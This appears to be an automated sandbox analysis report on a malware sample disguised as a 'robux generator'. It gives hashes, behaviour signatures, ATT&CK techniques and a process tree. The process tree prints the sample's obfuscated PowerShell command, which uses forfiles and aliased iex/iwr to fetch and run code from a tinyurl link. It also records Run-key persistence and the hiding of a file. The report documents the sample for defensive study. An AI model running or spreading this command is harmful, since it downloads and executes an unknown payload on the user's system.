Analysis
-
max time kernel
208s -
max time network
196s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
05/08/2024, 17:08
General
-
Target
robuxgeneratorapp.exe
-
Size
7.0MB
-
MD5
cd7f96aa5c48273581e22aaabfc7167e
-
SHA1
2e350a557878c59a93a1abf13b7bf2307fa21a78
-
SHA256
acdf56cd54e954f2a876520fbb1ac715a56176a5aa0815bfa19713d8f535043b
-
SHA512
ede9a99cd87485a0235c15afee1e63e0ecfb4c62c9a84e3cf5fe6cbe721877838c1135c0c9401432d6725b8f9ba35b7e6b41fa75d51baf96d825bc05ee654e87
-
SSDEEP
98304:ksa9wrXfr7GposZExhblaYQ91V/BbH6bGw0EukKou1+P:ha0fr7Gr6xip1VZtw0EHKFU
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\robuxgeneratorapp.exe"C:\Users\Admin\AppData\Local\Temp\robuxgeneratorapp.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" forfiles.exe /p c:\windows\system32 /m notepad.exe /c 'powershell.exe -command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)'2⤵
- Indirect Command Execution
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\forfiles.exe"C:\Windows\system32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)"3⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gro4oitd\gro4oitd.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES65F8.tmp" "c:\Users\Admin\AppData\Local\Temp\gro4oitd\CSCC8B9B9615ECB4A51B8145BA91E255E0.TMP"6⤵
-
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +s +h C:\Users\Admin\AppData\Local\Temp\OneDriveFileSync.dll5⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jawshtml.html1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff874fb46f8,0x7ff874fb4708,0x7ff874fb47182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:32⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:82⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\jusched.log1⤵
- Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Indirect Command Execution
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
3KB
MD55a7506c517bce099f84be749f2b15934
SHA1b23512c8d3c6d3e1722ac4098f84702d64abb305
SHA256c881f4b505d483e62691e7d378de625078f52936f68a0c4a8122bd8e0531e4e0
SHA51273bc375231a6ae02dadc38199b4114c4da194f8cd71919b2a44002ae0be2cd42b6c54957ad5cab832464e96606778d1284c4bb41457322d91fc0ddfe84e5d431
-
Filesize
152B
MD5ff63763eedb406987ced076e36ec9acf
SHA116365aa97cd1a115412f8ae436d5d4e9be5f7b5d
SHA2568f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c
SHA512ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f
-
Filesize
152B
MD52783c40400a8912a79cfd383da731086
SHA1001a131fe399c30973089e18358818090ca81789
SHA256331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5
SHA512b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685
-
Filesize
6KB
MD50289a9d6a2c7f97da923deb7202fa5af
SHA1ca91dc83455c1f5e842349aa0a7abaa9c7d78a3b
SHA25632d97a8be310c0ca326a6a36885da1c6a401335f77098c3dab983c492e6535fc
SHA5124d7090c37468c41ac55e8648fd4854df2d74be06fac6d2bfa7b178cda8948ced8a436caa371ab68d1eec90fdba04e7876ddee4e97e6b5f3e00174de78161a6e9
-
Filesize
6KB
MD5d1b070515c9429a2e0c2022cbb5134d6
SHA1160d8f09339446bb6eedca6bde37669e909975f2
SHA2562163477bb85a131375184079366b1dc6ea4ad32a97998d9f21b04c27466106de
SHA512e6e7b9cc03dda43d0a52ecfdcb4ce6f2c30d678b1506e83a9d6717e9db867b94d0fd73ca8b3f9a7989ec3b31516ee5c9b02e7c92a109c4177089bdfea6a1f478
-
Filesize
6KB
MD596f72dfc2ba38691aa9653f77e49e32c
SHA1536d639c17f1b60f08209fb76a0cb099d07fcc27
SHA256970f0a67564d8f0155a42d504a38f7f8f38e2d4f5c1c280309cb9a4118224f46
SHA51202d95a46f40d0ac5376d490e7c622c14c5672b175f2b2f8438472554e38cdbd82bcc502cd6b641ad389d0e6cf55c8d12ec4811bcb8832151131f07099709f493
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5ff0b35aafe7ca1f0f71382a4235e9f64
SHA126612530d7935c230186f6540fbfac36fb8eb385
SHA25617b6731a82052e14addf195772c69e6789ccba0a938683c6b1b293c29111a4d5
SHA512d59982c44ef45b45ab2cd2ba654f5ab0909c19f2271c283cbdca31a5f4e22edfef7c971238c8a278f5585741d985f3e3b6f2c3a3860e3a837da2e99cbe4ba6ce
-
Filesize
11KB
MD5e71abf87c21d87c8a13af5c1ce8f781c
SHA115fe8d985f7cdc7d82772d2522f0ee0d46fc9598
SHA256c16ed1b8ad122a44eeff3849814638a243bca2c4139b8b47d12316d8fdb75f57
SHA5121f7e4bbab4c227c86d8dc1952a7583fc58892a641f2d817ca77ec7fd45aab5d79aa9dae605274f9fc5368528502601b88ad3b9e06d63d4812811288e68bc6d7a
-
Filesize
11KB
MD544d58b18bd93b2fb3ce4f69ccaad1503
SHA1bcf38587541f408f20adc04e01b11a3a824f405d
SHA25603c8b8684eddf319b7f4f5017bed1fe2787cdc4408f520bf3352b4a2ace35fdb
SHA5126a74dc3b2de8f1d4b1b24b75a3231ec82646036caf22a6ad1bc1160d9d3fa3ba15b7db09df871fa78e25d968849055f1f8da813e6e1465546bb3d61c30b9d990
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
Filesize
109KB
MD56af2e1e48809d2a78b6226909095c4b7
SHA1ab71e5dbed15caa497a5082eb1c1322743863ba7
SHA256254ccbd438ec070539f848cafacc2f98c16dc42afe3ce5297ea0b3d34df7be72
SHA512e6c42e52f3b393cb9f1cbcd60305e89bb5e4df2fe7a3235fc2cfff4d5601a89185d03db407ca385bf7ce690e15a9a16715ca9deaedf249b68e5bb142af7e0d03
-
Filesize
1KB
MD5b48d615cee545cd4efc4c25839109c11
SHA17f2a2abb51e39bceec8368ee0a80f627dffbab38
SHA25649df01f63f443cd9bfb5adc0298f9c4014ca13dd35c758f7264e03ba5e52531b
SHA51207eb207696217de037c0158086327fee81ec12085566c69640ee73725a70cf6f093d01580e8edbbe1b4e17a969a1020f7bcab3c46c83675ae55ae9bfec1a714c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5c6a4503e62232e855929196924c63e89
SHA119dc3b285ce9815ab9aae240015b1661cde52bfe
SHA256e09f424945b4a7b8726d3e74c9c02062629edf34677eafa37888f32d16700d76
SHA512f29905c5e6a7298a6b56e1334b5a1a0e1b329b8e5c46119b82dd683e389849e5f9ec69988c06cb95cb2d211d6be88879003c3d9443bc3f96ea1a3c3e318755b2
-
Filesize
652B
MD59835dcaace28f8804aab41f480aa33e6
SHA1885e4cf49e88d8a816a4cc6c4abf30cd9d276444
SHA256a421121718ddc7b2d90528e6b85f9965b4d9ce5137bc5a88ba2c502d93d208b6
SHA512970ec92ee8828d6d2d9e89246a3af3be2d63c164fcd7a9312b44474bc834128ffdd62fe82ed63ec6e63759d9d2a3bd0e6b4d8ac9ed9c0ef175fe5383f5b49ed1
-
Filesize
1KB
MD5fe35992f552a2057291c867108a5c2eb
SHA13359cc35d11e68b353bbf06d03f1a9937e2689ee
SHA256c6cd29b3b2981c29538deb9b4445a10ec4993e93f058621f49e6ae294b4b6d1f
SHA5128e639db3a4696ffd380c495cf816b2571656d51aea0b3da75fbfc7151f1de704fe1508ff61c95fc2ac2ef230fd6fee48536c074d71f025675103b737128e9dff
-
Filesize
369B
MD5458575a8d3de5cd382c3a5bc9c88685e
SHA1d5b8f012ddb69258606bbb018bb1962e6052424f
SHA25621379e5314297f494d16256f2e991187e31e750556ba8ce70b8167d6ca4839f0
SHA512de1041a63f4acad77f1abe26ca0af553d31b897eec7f71aca3d0e4ee9cca55d46c23d118236cc7d21d8c228c673c9035a108f9ab594cf700b4bfbe25f6ccc8d4
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
5.2MB
-
Filesize
1.8MB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
704KB
-
Filesize
708KB